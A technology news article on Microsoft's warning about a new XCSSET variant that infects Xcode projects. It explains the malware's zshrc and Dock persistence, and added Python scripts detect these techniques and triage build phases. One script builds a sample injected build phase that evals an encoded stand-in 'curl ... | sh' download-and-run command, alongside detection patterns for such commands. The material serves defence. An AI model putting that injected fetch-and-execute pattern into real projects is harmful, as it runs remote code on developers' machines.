Microsoft warns of new, sophisticated malware targeting macOS developers | Technology News

Xcode, Apple’s integrated development environment for building apps for the Mac, iPhone and its other platforms, is being targeted by sophisticated malware, according to Microsoft.
Microsoft Threat Intelligence said on Monday, February 17, that it has uncovered a new variant of the macOS malware known as XCSSET, which targets developers by infecting their Xcode projects.
“While we’re only seeing this new XCSSET variant in limited attacks at this time, we’re sharing this information so users and organizations can protect themselves against this threat,” the company’s security research team said in a post on X.
XCSSET was first documented in 2020, and Microsoft says this is the first known new variant since 2022. The malware family targets digital wallets, collects data from the Notes app, and exfiltrates system information and files from compromised devices.
Earlier XCSSET campaigns exploited zero-day vulnerabilities in macOS and Safari; the new variant adds two persistence techniques that keep its payload running on an infected Mac.
The first technique is known as the “zshrc” method, where the malware creates a file named ~/.zshrc_aliases which contains the payload. “It then appends a command in the ~/.zshrc file to ensure that the created file is launched every time a new shell session is initiated, guaranteeing the malware’s persistence across shell sessions,” Microsoft Threat Intelligence said.
Because zsh reads ~/.zshrc at the start of every interactive session, a command appended there runs each time the user opens a terminal window, so the payload comes back after a reboot without the malware needing a LaunchAgent or any other persistence artifact that security tools routinely watch.
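A quick way to check a Mac for this pattern, as an added example that is not code from Microsoft's report: the script below scans the zsh startup files in a home directory for lines that source or execute another file, flags the file name the report gives (.zshrc_aliases) and any other sourced hidden dotfile outside the standard zsh set, and reports whether the payload file itself exists on disk. The home directory it scans is constructed in a temporary folder; point scan_home() at a real home directory to check a live machine.

```python
"""Added example (not code from the Microsoft report): look for the zshrc
persistence pattern in a home directory. The home directory and its
contents built by build_sample_home() are constructed for the demo."""
import re
import tempfile
from pathlib import Path

# Files zsh reads at startup; ~/.zshrc is the one the report names, but the
# same append trick works in any of them.
ZSH_STARTUP_FILES = [".zshenv", ".zprofile", ".zshrc", ".zlogin"]
KNOWN_BAD_NAMES = {".zshrc_aliases"}   # file name reported by Microsoft

# A line that hands control to another file: `source X`, `. X`, or running
# a shell interpreter on X.
SOURCE_RE = re.compile(r"(?:^|[;&|\s])(?:source|\.|sh|zsh|bash)\s+(?P<target>[^\s;&|]+)")


def find_sourced_targets(text):
    """Return [(lineno, target)] for every non-comment line that sources/executes a file."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        m = SOURCE_RE.search(line)
        if m:
            hits.append((lineno, m.group("target").strip("'\"")))
    return hits


def classify_target(target, home):
    """'known_bad' for the reported file name, 'hidden_dotfile' for any other
    sourced dotfile that is not a standard zsh startup file, else 'ok'."""
    expanded = target.replace("$HOME", str(home)).replace("~", str(home))
    name = Path(expanded).name
    if name in KNOWN_BAD_NAMES:
        return "known_bad"
    if name.startswith(".") and name not in ZSH_STARTUP_FILES:
        return "hidden_dotfile"
    return "ok"


def scan_home(home):
    """Scan every zsh startup file under `home`; return a list of findings."""
    home = Path(home)
    findings = []
    for fname in ZSH_STARTUP_FILES:
        path = home / fname
        if not path.is_file():
            continue
        for lineno, target in find_sourced_targets(path.read_text(errors="replace")):
            verdict = classify_target(target, home)
            if verdict != "ok":
                findings.append({"file": fname, "line": lineno, "target": target, "verdict": verdict})
    # The payload file on disk is a finding by itself, even if .zshrc was cleaned up.
    for name in KNOWN_BAD_NAMES:
        if (home / name).exists():
            findings.append({"file": name, "line": 0, "target": name, "verdict": "payload_file_present"})
    return findings


def build_sample_home(root):
    """Constructed home directory: an ordinary .zshrc with the appended line,
    plus a harmless stand-in for the payload file."""
    root = Path(root)
    (root / ".zshrc").write_text(
        'export PATH="$HOME/bin:$PATH"\n'
        "alias ll='ls -la'\n"
        'source "$HOME/.zshrc_aliases"\n'
    )
    (root / ".zshrc_aliases").write_text("# stand-in for the payload; a real one would be a script\n")
    return root


def demo_findings():
    """Run the scan against the constructed home directory."""
    with tempfile.TemporaryDirectory() as d:
        return scan_home(build_sample_home(d))


if __name__ == "__main__":
    for finding in demo_findings():
        print(finding)
```

The hidden_dotfile verdict is a heuristic and will flag legitimate tools that source a dotfile of their own; the known_bad and payload_file_present verdicts are the ones that match the reported behaviour directly.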
The XCSSET malware can also persist using what Microsoft calls the dock method. This technique downloads a tool for managing the items in the Dock, the bar of application icons along the bottom edge of the macOS screen.
“The malware then creates a fake Launchpad application and replaces the legitimate Launchpad’s path entry in the dock with this fake one. This ensures that every time the Launchpad is started from the dock, both the legitimate Launchpad and the malicious payload are executed,” Microsoft said.
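The corresponding check for the dock method, again an added example rather than Microsoft's code: the Dock stores its icons in the persistent-apps array of ~/Library/Preferences/com.apple.dock.plist, each tile carrying a file-label and a _CFURLString for the bundle it launches. The script builds a constructed copy of that plist with Python's plistlib, then audits every tile that calls itself Launchpad, or whose bundle is named Launchpad.app, against the two locations where Apple ships Launchpad. The path used for the tampered case is invented for the demo.

```python
"""Added example (not code from the Microsoft report): audit the Dock's
persistent-apps list for a Launchpad tile that no longer points at the
system Launchpad. The plist is constructed; on a real Mac, pass the bytes
of ~/Library/Preferences/com.apple.dock.plist to audit_plist_bytes()."""
import plistlib
from urllib.parse import quote, unquote, urlparse

# Where Launchpad.app legitimately lives: /System/Applications since
# macOS 10.15, /Applications on older releases.
EXPECTED_LAUNCHPAD_PATHS = {
    "/System/Applications/Launchpad.app",
    "/Applications/Launchpad.app",
}


def tile_path(tile):
    """Filesystem path a Dock tile points at (from its _CFURLString), or None."""
    url = tile.get("tile-data", {}).get("file-data", {}).get("_CFURLString")
    if not url:
        return None
    if url.startswith("file://"):
        return unquote(urlparse(url).path).rstrip("/")
    return url.rstrip("/")


def find_launchpad_tiles(dock):
    """Yield (label, path) for tiles that present themselves as Launchpad,
    matched by label or by bundle name so a relabelled fake is not missed."""
    for tile in dock.get("persistent-apps", []):
        label = tile.get("tile-data", {}).get("file-label", "")
        path = tile_path(tile)
        if label == "Launchpad" or (path and path.endswith("/Launchpad.app")):
            yield label, path


def audit_dock(dock):
    """Return findings for Launchpad tiles outside the expected locations;
    an empty list means every Launchpad tile is genuine."""
    return [
        {"label": label, "path": path, "reason": "Launchpad tile points outside the system location"}
        for label, path in find_launchpad_tiles(dock)
        if path not in EXPECTED_LAUNCHPAD_PATHS
    ]


def audit_plist_bytes(data):
    """Parse a com.apple.dock.plist (binary or XML) and audit it."""
    return audit_dock(plistlib.loads(data))


def make_tile(label, path):
    """Build a Dock tile in the layout com.apple.dock uses for persistent-apps."""
    return {
        "tile-type": "file-tile",
        "tile-data": {
            "file-label": label,
            "file-data": {"_CFURLString": "file://" + quote(path) + "/", "_CFURLStringType": 15},
        },
    }


def constructed_dock_plist(launchpad_path="/System/Applications/Launchpad.app"):
    """Constructed Dock preferences with a Safari tile and a Launchpad tile."""
    return plistlib.dumps({"persistent-apps": [
        make_tile("Safari", "/Applications/Safari.app"),
        make_tile("Launchpad", launchpad_path),
    ]})


# Hypothetical location of a fake Launchpad bundle (invented for the demo).
FAKE_LAUNCHPAD = "/Users/dev/Library/Application Support/Launchpad.app"

if __name__ == "__main__":
    print("clean dock:   ", audit_plist_bytes(constructed_dock_plist()))
    print("tampered dock:", audit_plist_bytes(constructed_dock_plist(FAKE_LAUNCHPAD)))
```

On a live Mac, `defaults export com.apple.dock -` prints the same preferences as XML, and plistlib.loads() accepts either the XML or the binary form, so the audit can be fed from that output without touching the preferences file directly.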
The new XCSSET variant is also harder to detect because it “uses a significantly more randomised approach for generating payloads to infect Xcode projects.”
“Both its encoding technique and number of encoding iterations are randomized. […] At its code level, the variant’s module names are also obfuscated, making it more challenging to determine the modules’ intent,” the cybersecurity researchers said.
To check whether a Mac has been infected with the latest XCSSET variant, Microsoft recommended using Microsoft Defender for Endpoint on Mac.
“Users must always inspect and verify any Xcode projects downloaded or cloned from repositories, as the malware usually spreads through infected projects. They should also only install apps from trusted sources, such as a software platform’s official app store,” it said.
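Microsoft's advice to inspect cloned Xcode projects can be partly automated. As an added example, not code from the report, the script below pulls every Run Script build phase out of a project.pbxproj (where an infected project carries its injected command), flags scripts that decode or eval content, and peels the encoding layers off any blob it finds, which is the check the randomised-encoding quote above calls for. The project text, the stand-in payload and the blob are constructed; because the report does not say which encodings the new variant uses, the peeler assumes base64 and hex layers in any order and any number.

```python
"""Added example (not code from the Microsoft report): triage Run Script
build phases in an Xcode project.pbxproj and strip encoding layers from
any blob found there. Project text, payload and blob are constructed."""
import base64
import re

PHASE_RE = re.compile(
    r'isa = PBXShellScriptBuildPhase;.*?shellScript = "((?:[^"\\]|\\.)*)";', re.DOTALL
)
# Signs that a build script is executing decoded or downloaded content.
SUSPICIOUS = [
    (re.compile(r"base64\s+(-d|-D|--decode)"), "decodes base64"),
    (re.compile(r"xxd\s+-r"), "reverses a hex dump"),
    (re.compile(r"\beval\b"), "uses eval"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|zsh)\b"), "pipes a download into a shell"),
]
BLOB_RE = re.compile(r"[A-Za-z0-9+/=]{64,}")
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def unescape_pbx(s):
    """pbxproj string literals escape quotes, backslashes and newlines."""
    return re.sub(r"\\(.)", lambda m: {"n": "\n", "t": "\t"}.get(m.group(1), m.group(1)), s)


def extract_build_scripts(pbxproj_text):
    """Return the shell script of every PBXShellScriptBuildPhase, in file order."""
    return [unescape_pbx(m.group(1)) for m in PHASE_RE.finditer(pbxproj_text)]


def find_blob(script):
    """Longest run of base64/hex characters that does not look like a filesystem path."""
    cands = [t for t in BLOB_RE.findall(script) if not t.startswith("/") and t.count("/") <= 2]
    return max(cands, key=len) if cands else None


def peel_layers(blob, max_layers=8):
    """Strip hex/base64 layers until the text is neither; return (text, layers_removed).
    Hex is tried first because a hex string is also valid base64 (assumed encodings)."""
    data = blob.strip()
    for n in range(max_layers):
        try:
            if HEX_RE.match(data) and len(data) % 2 == 0:
                raw = bytes.fromhex(data)
            elif B64_RE.match(data) and len(data) % 4 == 0:
                raw = base64.b64decode(data, validate=True)
            else:
                return data, n
            data = raw.decode("utf-8").strip()
        except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
            return data, n
    return data, max_layers


def triage_project(pbxproj_text):
    """For each build script: which indicators fired and what its blob decodes to."""
    results = []
    for i, script in enumerate(extract_build_scripts(pbxproj_text)):
        reasons = [why for pat, why in SUSPICIOUS if pat.search(script)]
        blob = find_blob(script)
        if blob:
            reasons.append("carries a long encoded blob")
        decoded = peel_layers(blob)[0] if blob else None
        results.append({"phase": i, "reasons": reasons, "decoded": decoded})
    return results


def wrap_layers(text, order):
    """Encode `text` with the given layers, innermost first (builds the sample blob)."""
    data = text.encode()
    for enc in order:
        data = data.hex().encode() if enc == "hex" else base64.b64encode(data)
    return data.decode()


def constructed_pbxproj(blob):
    """Two Run Script phases: a normal lint step and an injected decode-and-eval step."""
    return (
        "\t\tAAAA /* ShellScript */ = {\n"
        "\t\t\tisa = PBXShellScriptBuildPhase;\n"
        "\t\t\tshellPath = /bin/sh;\n"
        '\t\t\tshellScript = "if which swiftlint >/dev/null; then swiftlint; fi\\n";\n'
        "\t\t};\n"
        "\t\tBBBB /* ShellScript */ = {\n"
        "\t\t\tisa = PBXShellScriptBuildPhase;\n"
        "\t\t\tshellPath = /bin/sh;\n"
        '\t\t\tshellScript = "eval \\"$(echo ' + blob + ' | xxd -r -p | base64 -d | xxd -r -p)\\"\\n";\n'
        "\t\t};\n"
    )


# Constructed stand-in payload (loopback address; nothing real is fetched).
SAMPLE_PAYLOAD = "curl -fsSL http://127.0.0.1:8000/x | sh"
SAMPLE_BLOB = wrap_layers(SAMPLE_PAYLOAD, ["hex", "b64", "hex"])

if __name__ == "__main__":
    for r in triage_project(constructed_pbxproj(SAMPLE_BLOB)):
        print(r)
```

Run it against a real project with `triage_project(open("App.xcodeproj/project.pbxproj").read())`; any phase whose reasons list is non-empty deserves a manual read before the project is built, since Xcode runs these scripts with the developer's privileges.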